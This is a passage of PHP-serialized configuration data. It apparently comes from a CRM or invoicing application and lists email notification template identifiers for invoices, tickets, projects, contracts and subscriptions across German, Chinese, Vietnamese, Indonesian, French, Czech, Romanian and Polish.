:1;s:20:\"send-contract-german\";i:1;s:40:\"invoice-payment-recorded-to-staff-german\";i:1;s:24:\"auto-close-ticket-german\";i:1;s:46:\"new-project-discussion-created-to-staff-german\";i:1;s:49:\"new-project-discussion-created-to-customer-german\";i:1;s:44:\"new-project-file-uploaded-to-customer-german\";i:1;s:41:\"new-project-file-uploaded-to-staff-german\";i:1;s:49:\"new-project-discussion-comment-to-customer-german\";i:1;s:46:\"new-project-discussion-comment-to-staff-german\";i:1;s:36:\"staff-added-as-project-member-german\";i:1;s:31:\"estimate-expiry-reminder-german\";i:1;s:31:\"proposal-expiry-reminder-german\";i:1;s:24:\"new-staff-created-german\";i:1;s:30:\"contact-forgot-password-german\";i:1;s:31:\"contact-password-reseted-german\";i:1;s:27:\"contact-set-password-german\";i:1;s:28:\"staff-forgot-password-german\";i:1;s:29:\"staff-password-reseted-german\";i:1;s:26:\"assigned-to-project-german\";i:1;s:40:\"task-added-attachment-to-contacts-german\";i:1;s:33:\"task-commented-to-contacts-german\";i:1;s:24:\"new-lead-assigned-german\";i:1;s:23:\"client-statement-german\";i:1;s:31:\"ticket-assigned-to-admin-german\";i:1;s:37:\"new-client-registered-to-admin-german\";i:1;s:37:\"new-web-to-lead-form-submitted-german\";i:1;s:32:\"two-factor-authentication-german\";i:1;s:35:\"project-finished-to-customer-german\";i:1;s:33:\"credit-note-send-to-client-german\";i:1;s:34:\"task-status-change-to-staff-german\";i:1;s:37:\"task-status-change-to-contacts-german\";i:1;s:27:\"reminder-email-staff-german\";i:1;s:33:\"contract-comment-to-client-german\";i:1;s:32:\"contract-comment-to-admin-german\";i:1;s:24:\"send-subscription-german\";i:1;s:34:\"subscription-payment-failed-german\";i:1;s:28:\"subscription-canceled-german\";i:1;s:37:\"subscription-payment-succeeded-german\";i:1;s:35:\"contract-expiration-to-staff-german\";i:1;s:27:\"gdpr-removal-request-german\";i:1;s:32:\"gdpr-removal-request-lead-german\";i:1;s:36:\"client-registration-confirmed-german\";i:1;s:31:\"contract-signed-to-staff-german\";i:1;s:35:\"customer-subscribed-to-staff-german\";i:1;s:33:\"contact-verification-email-german\";i:1;s:50:\"new-customer-profile-file-uploaded-to-staff-german\";i:1;s:34:\"event-notification-to-staff-german\";i:1;s:43:\"subscription-payment-requires-action-german\";i:1;s:25:\"invoice-due-notice-german\";i:1;s:42:\"estimate-request-submitted-to-staff-german\";i:1;s:32:\"estimate-request-assigned-german\";i:1;s:40:\"estimate-request-received-to-user-german\";i:1;s:26:\"new-client-created-chinese\";i:1;s:30:\"invoice-send-to-client-chinese\";i:1;s:31:\"new-ticket-opened-admin-chinese\";i:1;s:20:\"ticket-reply-chinese\";i:1;s:27:\"ticket-autoresponse-chinese\";i:1;s:32:\"invoice-payment-recorded-chinese\";i:1;s:30:\"invoice-overdue-notice-chinese\";i:1;s:28:\"invoice-already-send-chinese\";i:1;s:32:\"new-ticket-created-staff-chinese\";i:1;s:31:\"estimate-send-to-client-chinese\";i:1;s:29:\"ticket-reply-to-admin-chinese\";i:1;s:29:\"estimate-already-send-chinese\";i:1;s:27:\"contract-expiration-chinese\";i:1;s:21:\"task-assigned-chinese\";i:1;s:30:\"task-added-as-follower-chinese\";i:1;s:22:\"task-commented-chinese\";i:1;s:29:\"task-added-attachment-chinese\";i:1;s:34:\"estimate-declined-to-staff-chinese\";i:1;s:34:\"estimate-accepted-to-staff-chinese\";i:1;s:32:\"proposal-client-accepted-chinese\";i:1;s:33:\"proposal-send-to-customer-chinese\";i:1;s:32:\"proposal-client-declined-chinese\";i:1;s:33:\"proposal-client-thank-you-chinese\";i:1;s:34:\"proposal-comment-to-client-chinese\";i:1;s:33:\"proposal-comment-to-admin-chinese\";i:1;s:38:\"estimate-thank-you-to-customer-chinese\";i:1;s:34:\"task-deadline-notification-chinese\";i:1;s:21:\"send-contract-chinese\";i:1;s:41:\"invoice-payment-recorded-to-staff-chinese\";i:1;s:25:\"auto-close-ticket-chinese\";i:1;s:47:\"new-project-discussion-created-to-staff-chinese\";i:1;s:50:\"new-project-discussion-created-to-customer-chinese\";i:1;s:45:\"new-project-file-uploaded-to-customer-chinese\";i:1;s:42:\"new-project-file-uploaded-to-staff-chinese\";i:1;s:50:\"new-project-discussion-comment-to-customer-chinese\";i:1;s:47:\"new-project-discussion-comment-to-staff-chinese\";i:1;s:37:\"staff-added-as-project-member-chinese\";i:1;s:32:\"estimate-expiry-reminder-chinese\";i:1;s:32:\"proposal-expiry-reminder-chinese\";i:1;s:25:\"new-staff-created-chinese\";i:1;s:31:\"contact-forgot-password-chinese\";i:1;s:32:\"contact-password-reseted-chinese\";i:1;s:28:\"contact-set-password-chinese\";i:1;s:29:\"staff-forgot-password-chinese\";i:1;s:30:\"staff-password-reseted-chinese\";i:1;s:27:\"assigned-to-project-chinese\";i:1;s:41:\"task-added-attachment-to-contacts-chinese\";i:1;s:34:\"task-commented-to-contacts-chinese\";i:1;s:25:\"new-lead-assigned-chinese\";i:1;s:24:\"client-statement-chinese\";i:1;s:32:\"ticket-assigned-to-admin-chinese\";i:1;s:38:\"new-client-registered-to-admin-chinese\";i:1;s:38:\"new-web-to-lead-form-submitted-chinese\";i:1;s:33:\"two-factor-authentication-chinese\";i:1;s:36:\"project-finished-to-customer-chinese\";i:1;s:34:\"credit-note-send-to-client-chinese\";i:1;s:35:\"task-status-change-to-staff-chinese\";i:1;s:38:\"task-status-change-to-contacts-chinese\";i:1;s:28:\"reminder-email-staff-chinese\";i:1;s:34:\"contract-comment-to-client-chinese\";i:1;s:33:\"contract-comment-to-admin-chinese\";i:1;s:25:\"send-subscription-chinese\";i:1;s:35:\"subscription-payment-failed-chinese\";i:1;s:29:\"subscription-canceled-chinese\";i:1;s:38:\"subscription-payment-succeeded-chinese\";i:1;s:36:\"contract-expiration-to-staff-chinese\";i:1;s:28:\"gdpr-removal-request-chinese\";i:1;s:33:\"gdpr-removal-request-lead-chinese\";i:1;s:37:\"client-registration-confirmed-chinese\";i:1;s:32:\"contract-signed-to-staff-chinese\";i:1;s:36:\"customer-subscribed-to-staff-chinese\";i:1;s:34:\"contact-verification-email-chinese\";i:1;s:51:\"new-customer-profile-file-uploaded-to-staff-chinese\";i:1;s:35:\"event-notification-to-staff-chinese\";i:1;s:44:\"subscription-payment-requires-action-chinese\";i:1;s:26:\"invoice-due-notice-chinese\";i:1;s:43:\"estimate-request-submitted-to-staff-chinese\";i:1;s:33:\"estimate-request-assigned-chinese\";i:1;s:41:\"estimate-request-received-to-user-chinese\";i:1;s:29:\"new-client-created-vietnamese\";i:1;s:33:\"invoice-send-to-client-vietnamese\";i:1;s:34:\"new-ticket-opened-admin-vietnamese\";i:1;s:23:\"ticket-reply-vietnamese\";i:1;s:30:\"ticket-autoresponse-vietnamese\";i:1;s:35:\"invoice-payment-recorded-vietnamese\";i:1;s:33:\"invoice-overdue-notice-vietnamese\";i:1;s:31:\"invoice-already-send-vietnamese\";i:1;s:35:\"new-ticket-created-staff-vietnamese\";i:1;s:34:\"estimate-send-to-client-vietnamese\";i:1;s:32:\"ticket-reply-to-admin-vietnamese\";i:1;s:32:\"estimate-already-send-vietnamese\";i:1;s:30:\"contract-expiration-vietnamese\";i:1;s:24:\"task-assigned-vietnamese\";i:1;s:33:\"task-added-as-follower-vietnamese\";i:1;s:25:\"task-commented-vietnamese\";i:1;s:32:\"task-added-attachment-vietnamese\";i:1;s:37:\"estimate-declined-to-staff-vietnamese\";i:1;s:37:\"estimate-accepted-to-staff-vietnamese\";i:1;s:35:\"proposal-client-accepted-vietnamese\";i:1;s:36:\"proposal-send-to-customer-vietnamese\";i:1;s:35:\"proposal-client-declined-vietnamese\";i:1;s:36:\"proposal-client-thank-you-vietnamese\";i:1;s:37:\"proposal-comment-to-client-vietnamese\";i:1;s:36:\"proposal-comment-to-admin-vietnamese\";i:1;s:41:\"estimate-thank-you-to-customer-vietnamese\";i:1;s:37:\"task-deadline-notification-vietnamese\";i:1;s:24:\"send-contract-vietnamese\";i:1;s:44:\"invoice-payment-recorded-to-staff-vietnamese\";i:1;s:28:\"auto-close-ticket-vietnamese\";i:1;s:50:\"new-project-discussion-created-to-staff-vietnamese\";i:1;s:53:\"new-project-discussion-created-to-customer-vietnamese\";i:1;s:48:\"new-project-file-uploaded-to-customer-vietnamese\";i:1;s:45:\"new-project-file-uploaded-to-staff-vietnamese\";i:1;s:53:\"new-project-discussion-comment-to-customer-vietnamese\";i:1;s:50:\"new-project-discussion-comment-to-staff-vietnamese\";i:1;s:40:\"staff-added-as-project-member-vietnamese\";i:1;s:35:\"estimate-expiry-reminder-vietnamese\";i:1;s:35:\"proposal-expiry-reminder-vietnamese\";i:1;s:28:\"new-staff-created-vietnamese\";i:1;s:34:\"contact-forgot-password-vietnamese\";i:1;s:35:\"contact-password-reseted-vietnamese\";i:1;s:31:\"contact-set-password-vietnamese\";i:1;s:32:\"staff-forgot-password-vietnamese\";i:1;s:33:\"staff-password-reseted-vietnamese\";i:1;s:30:\"assigned-to-project-vietnamese\";i:1;s:44:\"task-added-attachment-to-contacts-vietnamese\";i:1;s:37:\"task-commented-to-contacts-vietnamese\";i:1;s:28:\"new-lead-assigned-vietnamese\";i:1;s:27:\"client-statement-vietnamese\";i:1;s:35:\"ticket-assigned-to-admin-vietnamese\";i:1;s:41:\"new-client-registered-to-admin-vietnamese\";i:1;s:41:\"new-web-to-lead-form-submitted-vietnamese\";i:1;s:36:\"two-factor-authentication-vietnamese\";i:1;s:39:\"project-finished-to-customer-vietnamese\";i:1;s:37:\"credit-note-send-to-client-vietnamese\";i:1;s:38:\"task-status-change-to-staff-vietnamese\";i:1;s:41:\"task-status-change-to-contacts-vietnamese\";i:1;s:31:\"reminder-email-staff-vietnamese\";i:1;s:37:\"contract-comment-to-client-vietnamese\";i:1;s:36:\"contract-comment-to-admin-vietnamese\";i:1;s:28:\"send-subscription-vietnamese\";i:1;s:38:\"subscription-payment-failed-vietnamese\";i:1;s:32:\"subscription-canceled-vietnamese\";i:1;s:41:\"subscription-payment-succeeded-vietnamese\";i:1;s:39:\"contract-expiration-to-staff-vietnamese\";i:1;s:31:\"gdpr-removal-request-vietnamese\";i:1;s:36:\"gdpr-removal-request-lead-vietnamese\";i:1;s:40:\"client-registration-confirmed-vietnamese\";i:1;s:35:\"contract-signed-to-staff-vietnamese\";i:1;s:39:\"customer-subscribed-to-staff-vietnamese\";i:1;s:37:\"contact-verification-email-vietnamese\";i:1;s:54:\"new-customer-profile-file-uploaded-to-staff-vietnamese\";i:1;s:38:\"event-notification-to-staff-vietnamese\";i:1;s:47:\"subscription-payment-requires-action-vietnamese\";i:1;s:29:\"invoice-due-notice-vietnamese\";i:1;s:46:\"estimate-request-submitted-to-staff-vietnamese\";i:1;s:36:\"estimate-request-assigned-vietnamese\";i:1;s:44:\"estimate-request-received-to-user-vietnamese\";i:1;s:28:\"new-client-created-indonesia\";i:1;s:32:\"invoice-send-to-client-indonesia\";i:1;s:33:\"new-ticket-opened-admin-indonesia\";i:1;s:22:\"ticket-reply-indonesia\";i:1;s:29:\"ticket-autoresponse-indonesia\";i:1;s:34:\"invoice-payment-recorded-indonesia\";i:1;s:32:\"invoice-overdue-notice-indonesia\";i:1;s:30:\"invoice-already-send-indonesia\";i:1;s:34:\"new-ticket-created-staff-indonesia\";i:1;s:33:\"estimate-send-to-client-indonesia\";i:1;s:31:\"ticket-reply-to-admin-indonesia\";i:1;s:31:\"estimate-already-send-indonesia\";i:1;s:29:\"contract-expiration-indonesia\";i:1;s:23:\"task-assigned-indonesia\";i:1;s:32:\"task-added-as-follower-indonesia\";i:1;s:24:\"task-commented-indonesia\";i:1;s:31:\"task-added-attachment-indonesia\";i:1;s:36:\"estimate-declined-to-staff-indonesia\";i:1;s:36:\"estimate-accepted-to-staff-indonesia\";i:1;s:34:\"proposal-client-accepted-indonesia\";i:1;s:35:\"proposal-send-to-customer-indonesia\";i:1;s:34:\"proposal-client-declined-indonesia\";i:1;s:35:\"proposal-client-thank-you-indonesia\";i:1;s:36:\"proposal-comment-to-client-indonesia\";i:1;s:35:\"proposal-comment-to-admin-indonesia\";i:1;s:40:\"estimate-thank-you-to-customer-indonesia\";i:1;s:36:\"task-deadline-notification-indonesia\";i:1;s:23:\"send-contract-indonesia\";i:1;s:43:\"invoice-payment-recorded-to-staff-indonesia\";i:1;s:27:\"auto-close-ticket-indonesia\";i:1;s:49:\"new-project-discussion-created-to-staff-indonesia\";i:1;s:52:\"new-project-discussion-created-to-customer-indonesia\";i:1;s:47:\"new-project-file-uploaded-to-customer-indonesia\";i:1;s:44:\"new-project-file-uploaded-to-staff-indonesia\";i:1;s:52:\"new-project-discussion-comment-to-customer-indonesia\";i:1;s:49:\"new-project-discussion-comment-to-staff-indonesia\";i:1;s:39:\"staff-added-as-project-member-indonesia\";i:1;s:34:\"estimate-expiry-reminder-indonesia\";i:1;s:34:\"proposal-expiry-reminder-indonesia\";i:1;s:27:\"new-staff-created-indonesia\";i:1;s:33:\"contact-forgot-password-indonesia\";i:1;s:34:\"contact-password-reseted-indonesia\";i:1;s:30:\"contact-set-password-indonesia\";i:1;s:31:\"staff-forgot-password-indonesia\";i:1;s:32:\"staff-password-reseted-indonesia\";i:1;s:29:\"assigned-to-project-indonesia\";i:1;s:43:\"task-added-attachment-to-contacts-indonesia\";i:1;s:36:\"task-commented-to-contacts-indonesia\";i:1;s:27:\"new-lead-assigned-indonesia\";i:1;s:26:\"client-statement-indonesia\";i:1;s:34:\"ticket-assigned-to-admin-indonesia\";i:1;s:40:\"new-client-registered-to-admin-indonesia\";i:1;s:40:\"new-web-to-lead-form-submitted-indonesia\";i:1;s:35:\"two-factor-authentication-indonesia\";i:1;s:38:\"project-finished-to-customer-indonesia\";i:1;s:36:\"credit-note-send-to-client-indonesia\";i:1;s:37:\"task-status-change-to-staff-indonesia\";i:1;s:40:\"task-status-change-to-contacts-indonesia\";i:1;s:30:\"reminder-email-staff-indonesia\";i:1;s:36:\"contract-comment-to-client-indonesia\";i:1;s:35:\"contract-comment-to-admin-indonesia\";i:1;s:27:\"send-subscription-indonesia\";i:1;s:37:\"subscription-payment-failed-indonesia\";i:1;s:31:\"subscription-canceled-indonesia\";i:1;s:40:\"subscription-payment-succeeded-indonesia\";i:1;s:38:\"contract-expiration-to-staff-indonesia\";i:1;s:30:\"gdpr-removal-request-indonesia\";i:1;s:35:\"gdpr-removal-request-lead-indonesia\";i:1;s:39:\"client-registration-confirmed-indonesia\";i:1;s:34:\"contract-signed-to-staff-indonesia\";i:1;s:38:\"customer-subscribed-to-staff-indonesia\";i:1;s:36:\"contact-verification-email-indonesia\";i:1;s:53:\"new-customer-profile-file-uploaded-to-staff-indonesia\";i:1;s:37:\"event-notification-to-staff-indonesia\";i:1;s:46:\"subscription-payment-requires-action-indonesia\";i:1;s:28:\"invoice-due-notice-indonesia\";i:1;s:45:\"estimate-request-submitted-to-staff-indonesia\";i:1;s:35:\"estimate-request-assigned-indonesia\";i:1;s:43:\"estimate-request-received-to-user-indonesia\";i:1;s:25:\"new-client-created-french\";i:1;s:29:\"invoice-send-to-client-french\";i:1;s:30:\"new-ticket-opened-admin-french\";i:1;s:19:\"ticket-reply-french\";i:1;s:26:\"ticket-autoresponse-french\";i:1;s:31:\"invoice-payment-recorded-french\";i:1;s:29:\"invoice-overdue-notice-french\";i:1;s:27:\"invoice-already-send-french\";i:1;s:31:\"new-ticket-created-staff-french\";i:1;s:30:\"estimate-send-to-client-french\";i:1;s:28:\"ticket-reply-to-admin-french\";i:1;s:28:\"estimate-already-send-french\";i:1;s:26:\"contract-expiration-french\";i:1;s:20:\"task-assigned-french\";i:1;s:29:\"task-added-as-follower-french\";i:1;s:21:\"task-commented-french\";i:1;s:28:\"task-added-attachment-french\";i:1;s:33:\"estimate-declined-to-staff-french\";i:1;s:33:\"estimate-accepted-to-staff-french\";i:1;s:31:\"proposal-client-accepted-french\";i:1;s:32:\"proposal-send-to-customer-french\";i:1;s:31:\"proposal-client-declined-french\";i:1;s:32:\"proposal-client-thank-you-french\";i:1;s:33:\"proposal-comment-to-client-french\";i:1;s:32:\"proposal-comment-to-admin-french\";i:1;s:37:\"estimate-thank-you-to-customer-french\";i:1;s:33:\"task-deadline-notification-french\";i:1;s:20:\"send-contract-french\";i:1;s:40:\"invoice-payment-recorded-to-staff-french\";i:1;s:24:\"auto-close-ticket-french\";i:1;s:46:\"new-project-discussion-created-to-staff-french\";i:1;s:49:\"new-project-discussion-created-to-customer-french\";i:1;s:44:\"new-project-file-uploaded-to-customer-french\";i:1;s:41:\"new-project-file-uploaded-to-staff-french\";i:1;s:49:\"new-project-discussion-comment-to-customer-french\";i:1;s:46:\"new-project-discussion-comment-to-staff-french\";i:1;s:36:\"staff-added-as-project-member-french\";i:1;s:31:\"estimate-expiry-reminder-french\";i:1;s:31:\"proposal-expiry-reminder-french\";i:1;s:24:\"new-staff-created-french\";i:1;s:30:\"contact-forgot-password-french\";i:1;s:31:\"contact-password-reseted-french\";i:1;s:27:\"contact-set-password-french\";i:1;s:28:\"staff-forgot-password-french\";i:1;s:29:\"staff-password-reseted-french\";i:1;s:26:\"assigned-to-project-french\";i:1;s:40:\"task-added-attachment-to-contacts-french\";i:1;s:33:\"task-commented-to-contacts-french\";i:1;s:24:\"new-lead-assigned-french\";i:1;s:23:\"client-statement-french\";i:1;s:31:\"ticket-assigned-to-admin-french\";i:1;s:37:\"new-client-registered-to-admin-french\";i:1;s:37:\"new-web-to-lead-form-submitted-french\";i:1;s:32:\"two-factor-authentication-french\";i:1;s:35:\"project-finished-to-customer-french\";i:1;s:33:\"credit-note-send-to-client-french\";i:1;s:34:\"task-status-change-to-staff-french\";i:1;s:37:\"task-status-change-to-contacts-french\";i:1;s:27:\"reminder-email-staff-french\";i:1;s:33:\"contract-comment-to-client-french\";i:1;s:32:\"contract-comment-to-admin-french\";i:1;s:24:\"send-subscription-french\";i:1;s:34:\"subscription-payment-failed-french\";i:1;s:28:\"subscription-canceled-french\";i:1;s:37:\"subscription-payment-succeeded-french\";i:1;s:35:\"contract-expiration-to-staff-french\";i:1;s:27:\"gdpr-removal-request-french\";i:1;s:32:\"gdpr-removal-request-lead-french\";i:1;s:36:\"client-registration-confirmed-french\";i:1;s:31:\"contract-signed-to-staff-french\";i:1;s:35:\"customer-subscribed-to-staff-french\";i:1;s:33:\"contact-verification-email-french\";i:1;s:50:\"new-customer-profile-file-uploaded-to-staff-french\";i:1;s:34:\"event-notification-to-staff-french\";i:1;s:43:\"subscription-payment-requires-action-french\";i:1;s:25:\"invoice-due-notice-french\";i:1;s:42:\"estimate-request-submitted-to-staff-french\";i:1;s:32:\"estimate-request-assigned-french\";i:1;s:40:\"estimate-request-received-to-user-french\";i:1;s:24:\"new-client-created-czech\";i:1;s:28:\"invoice-send-to-client-czech\";i:1;s:29:\"new-ticket-opened-admin-czech\";i:1;s:18:\"ticket-reply-czech\";i:1;s:25:\"ticket-autoresponse-czech\";i:1;s:30:\"invoice-payment-recorded-czech\";i:1;s:28:\"invoice-overdue-notice-czech\";i:1;s:26:\"invoice-already-send-czech\";i:1;s:30:\"new-ticket-created-staff-czech\";i:1;s:29:\"estimate-send-to-client-czech\";i:1;s:27:\"ticket-reply-to-admin-czech\";i:1;s:27:\"estimate-already-send-czech\";i:1;s:25:\"contract-expiration-czech\";i:1;s:19:\"task-assigned-czech\";i:1;s:28:\"task-added-as-follower-czech\";i:1;s:20:\"task-commented-czech\";i:1;s:27:\"task-added-attachment-czech\";i:1;s:32:\"estimate-declined-to-staff-czech\";i:1;s:32:\"estimate-accepted-to-staff-czech\";i:1;s:30:\"proposal-client-accepted-czech\";i:1;s:31:\"proposal-send-to-customer-czech\";i:1;s:30:\"proposal-client-declined-czech\";i:1;s:31:\"proposal-client-thank-you-czech\";i:1;s:32:\"proposal-comment-to-client-czech\";i:1;s:31:\"proposal-comment-to-admin-czech\";i:1;s:36:\"estimate-thank-you-to-customer-czech\";i:1;s:32:\"task-deadline-notification-czech\";i:1;s:19:\"send-contract-czech\";i:1;s:39:\"invoice-payment-recorded-to-staff-czech\";i:1;s:23:\"auto-close-ticket-czech\";i:1;s:45:\"new-project-discussion-created-to-staff-czech\";i:1;s:48:\"new-project-discussion-created-to-customer-czech\";i:1;s:43:\"new-project-file-uploaded-to-customer-czech\";i:1;s:40:\"new-project-file-uploaded-to-staff-czech\";i:1;s:48:\"new-project-discussion-comment-to-customer-czech\";i:1;s:45:\"new-project-discussion-comment-to-staff-czech\";i:1;s:35:\"staff-added-as-project-member-czech\";i:1;s:30:\"estimate-expiry-reminder-czech\";i:1;s:30:\"proposal-expiry-reminder-czech\";i:1;s:23:\"new-staff-created-czech\";i:1;s:29:\"contact-forgot-password-czech\";i:1;s:30:\"contact-password-reseted-czech\";i:1;s:26:\"contact-set-password-czech\";i:1;s:27:\"staff-forgot-password-czech\";i:1;s:28:\"staff-password-reseted-czech\";i:1;s:25:\"assigned-to-project-czech\";i:1;s:39:\"task-added-attachment-to-contacts-czech\";i:1;s:32:\"task-commented-to-contacts-czech\";i:1;s:23:\"new-lead-assigned-czech\";i:1;s:22:\"client-statement-czech\";i:1;s:30:\"ticket-assigned-to-admin-czech\";i:1;s:36:\"new-client-registered-to-admin-czech\";i:1;s:36:\"new-web-to-lead-form-submitted-czech\";i:1;s:31:\"two-factor-authentication-czech\";i:1;s:34:\"project-finished-to-customer-czech\";i:1;s:32:\"credit-note-send-to-client-czech\";i:1;s:33:\"task-status-change-to-staff-czech\";i:1;s:36:\"task-status-change-to-contacts-czech\";i:1;s:26:\"reminder-email-staff-czech\";i:1;s:32:\"contract-comment-to-client-czech\";i:1;s:31:\"contract-comment-to-admin-czech\";i:1;s:23:\"send-subscription-czech\";i:1;s:33:\"subscription-payment-failed-czech\";i:1;s:27:\"subscription-canceled-czech\";i:1;s:36:\"subscription-payment-succeeded-czech\";i:1;s:34:\"contract-expiration-to-staff-czech\";i:1;s:26:\"gdpr-removal-request-czech\";i:1;s:31:\"gdpr-removal-request-lead-czech\";i:1;s:35:\"client-registration-confirmed-czech\";i:1;s:30:\"contract-signed-to-staff-czech\";i:1;s:34:\"customer-subscribed-to-staff-czech\";i:1;s:32:\"contact-verification-email-czech\";i:1;s:49:\"new-customer-profile-file-uploaded-to-staff-czech\";i:1;s:33:\"event-notification-to-staff-czech\";i:1;s:42:\"subscription-payment-requires-action-czech\";i:1;s:24:\"invoice-due-notice-czech\";i:1;s:41:\"estimate-request-submitted-to-staff-czech\";i:1;s:31:\"estimate-request-assigned-czech\";i:1;s:39:\"estimate-request-received-to-user-czech\";i:1;s:27:\"new-client-created-romanian\";i:1;s:31:\"invoice-send-to-client-romanian\";i:1;s:32:\"new-ticket-opened-admin-romanian\";i:1;s:21:\"ticket-reply-romanian\";i:1;s:28:\"ticket-autoresponse-romanian\";i:1;s:33:\"invoice-payment-recorded-romanian\";i:1;s:31:\"invoice-overdue-notice-romanian\";i:1;s:29:\"invoice-already-send-romanian\";i:1;s:33:\"new-ticket-created-staff-romanian\";i:1;s:32:\"estimate-send-to-client-romanian\";i:1;s:30:\"ticket-reply-to-admin-romanian\";i:1;s:30:\"estimate-already-send-romanian\";i:1;s:28:\"contract-expiration-romanian\";i:1;s:22:\"task-assigned-romanian\";i:1;s:31:\"task-added-as-follower-romanian\";i:1;s:23:\"task-commented-romanian\";i:1;s:30:\"task-added-attachment-romanian\";i:1;s:35:\"estimate-declined-to-staff-romanian\";i:1;s:35:\"estimate-accepted-to-staff-romanian\";i:1;s:33:\"proposal-client-accepted-romanian\";i:1;s:34:\"proposal-send-to-customer-romanian\";i:1;s:33:\"proposal-client-declined-romanian\";i:1;s:34:\"proposal-client-thank-you-romanian\";i:1;s:35:\"proposal-comment-to-client-romanian\";i:1;s:34:\"proposal-comment-to-admin-romanian\";i:1;s:39:\"estimate-thank-you-to-customer-romanian\";i:1;s:35:\"task-deadline-notification-romanian\";i:1;s:22:\"send-contract-romanian\";i:1;s:42:\"invoice-payment-recorded-to-staff-romanian\";i:1;s:26:\"auto-close-ticket-romanian\";i:1;s:48:\"new-project-discussion-created-to-staff-romanian\";i:1;s:51:\"new-project-discussion-created-to-customer-romanian\";i:1;s:46:\"new-project-file-uploaded-to-customer-romanian\";i:1;s:43:\"new-project-file-uploaded-to-staff-romanian\";i:1;s:51:\"new-project-discussion-comment-to-customer-romanian\";i:1;s:48:\"new-project-discussion-comment-to-staff-romanian\";i:1;s:38:\"staff-added-as-project-member-romanian\";i:1;s:33:\"estimate-expiry-reminder-romanian\";i:1;s:33:\"proposal-expiry-reminder-romanian\";i:1;s:26:\"new-staff-created-romanian\";i:1;s:32:\"contact-forgot-password-romanian\";i:1;s:33:\"contact-password-reseted-romanian\";i:1;s:29:\"contact-set-password-romanian\";i:1;s:30:\"staff-forgot-password-romanian\";i:1;s:31:\"staff-password-reseted-romanian\";i:1;s:28:\"assigned-to-project-romanian\";i:1;s:42:\"task-added-attachment-to-contacts-romanian\";i:1;s:35:\"task-commented-to-contacts-romanian\";i:1;s:26:\"new-lead-assigned-romanian\";i:1;s:25:\"client-statement-romanian\";i:1;s:33:\"ticket-assigned-to-admin-romanian\";i:1;s:39:\"new-client-registered-to-admin-romanian\";i:1;s:39:\"new-web-to-lead-form-submitted-romanian\";i:1;s:34:\"two-factor-authentication-romanian\";i:1;s:37:\"project-finished-to-customer-romanian\";i:1;s:35:\"credit-note-send-to-client-romanian\";i:1;s:36:\"task-status-change-to-staff-romanian\";i:1;s:39:\"task-status-change-to-contacts-romanian\";i:1;s:29:\"reminder-email-staff-romanian\";i:1;s:35:\"contract-comment-to-client-romanian\";i:1;s:34:\"contract-comment-to-admin-romanian\";i:1;s:26:\"send-subscription-romanian\";i:1;s:36:\"subscription-payment-failed-romanian\";i:1;s:30:\"subscription-canceled-romanian\";i:1;s:39:\"subscription-payment-succeeded-romanian\";i:1;s:37:\"contract-expiration-to-staff-romanian\";i:1;s:29:\"gdpr-removal-request-romanian\";i:1;s:34:\"gdpr-removal-request-lead-romanian\";i:1;s:38:\"client-registration-confirmed-romanian\";i:1;s:33:\"contract-signed-to-staff-romanian\";i:1;s:37:\"customer-subscribed-to-staff-romanian\";i:1;s:35:\"contact-verification-email-romanian\";i:1;s:52:\"new-customer-profile-file-uploaded-to-staff-romanian\";i:1;s:36:\"event-notification-to-staff-romanian\";i:1;s:45:\"subscription-payment-requires-action-romanian\";i:1;s:27:\"invoice-due-notice-romanian\";i:1;s:44:\"estimate-request-submitted-to-staff-romanian\";i:1;s:34:\"estimate-request-assigned-romanian\";i:1;s:42:\"estimate-request-received-to-user-romanian\";i:1;s:25:\"new-client-created-polish\";i:1;s:29:\"invoice-send-to-client-polish\";i:1;s:30:\"new-ticket-opened-admin-polish\";i:1;s:19:\"ticket-reply-polish\";i:1;s:26:\"ticket-autoresponse-polish\";i:1;s:31:\"invoice-payment-recorded-polish\";i:1;s:29:\"invoice-overdue-notice-polish\";i:1;s:27:\"invoice-already-send-polish\";i:1;s:31:\"new-ticket-created-staff-polish\";i:1;s:30:\"estimate-send-to-client-polish\";i:1;s:28:\"ticket-reply-to-admin-polish\";i:1;s:28:\"estimate-already-send-polish\";i:1;s:26:\"contract-expiration-polish\";i:1;s:20:\"task-assigned-polish\";i:1;s:29:\"task-added-as-follower-polish\";i:1;s:21:\"task-commented-polish\";i:1;s:28:\"task-added-attachment-polish\";i:1;s:33:\"estimate-declined-to-staff-polish\";i:1;s:33:\"estimate-accepted-to-staff-polish\";i:1;s:31:\"proposal-client-accepted-polish\";i:1;s:32:\"proposal-send-to-customer-polish\";i:1;s:31:\"proposal-client-declined-polish\";i:1;s:32:\"proposal-client-thank-you-polish\";i:1;s:33:\"proposal-comment-to-client-polish\";i:1;s:32:\"proposal-comment-to-admin-polish\";i:1;s:37:\"estimate-thank-you-to-customer-polish\";i:1;s:33:\"task-deadline-notification-polish\";i:1;s:20:\"send-contract-polish\";i:1;s:40:\"invoice-payment-recorded-to-staff-polish\";i:1;s:24:\"auto-close-ticket-polish\";i:1;s:46:\"new-project-discussion-created-to-staff-polish\";i:1;s:49:\"new-project-discussion-created-to-customer-polish\";i:1;s:44:\"new-project-file-uploaded-to-customer-polish\";i:1;s:41:\"new-project-file-uploaded-to-staff-polish\";i:1;s:49:\"new-project-discussion-comment-to-customer-polish\";i:1;s:46:\"new-project-discussion-comment-to-staff-polish\";i:1;s:36:\"staff-added-as-project-member-polish\";i:1;s:31:\"estimate-expiry-reminder-polish\";i:1;s:31:\"proposal-expiry-reminder-polish\";i:1;s:24:\"new-staff-created-polish\";i:1;s:30:\"contact-forgot-password-polish\";i:1;s:31:\"contact-password-reseted-polish\";i:1;s:27:\"contact-set-password-polish\";i:1;s:28:\"staff-forgot-password-polish\";i:1;s:29:\"staff-password-reseted-polish\";i:1;s:26:\"assigned-to-project-polish\";i:1;s:40:\"task-added-attachment-to-contacts-polish\";i:1;s:33:\"task-commented-to-contacts-polish\";i:1;s:24:\"new-lead-assigned-polish\";i:1;s:23:\"client-statement-polish\";i:1;s:31:\"ticket-assigned-to-admin-polish\";i:1;s:37:\"new-client-registered-to-admin-polish\";i:1;s:37:\"new-web-to-lead-form-submitted-polish\";i:1;s:32:\"two-factor-authentication-polish\";i:1;s:35:\"project-finished-to-customer-polish\";i:1;s:33:\"credit-note-send-to-client-polish\";i:1;s:34:\"task-status-change-to-staff-polish\";i:1;s:37:\"task-status-change-to-contacts-polish\";i:1;s:27:\"reminder-email-staff-polish\";i:1;s:33:\"contract-comment-to-client-polish\";i:1;s:32:\"contract-comment-to-admin-polish\";i:1;s:24:\"send-subscription-polish\";i:1;s:34:\"subscription-payment-failed-polish\";i:1;s:28:\"subscription-canceled-polish\";i:1;s:37:\"subscription-p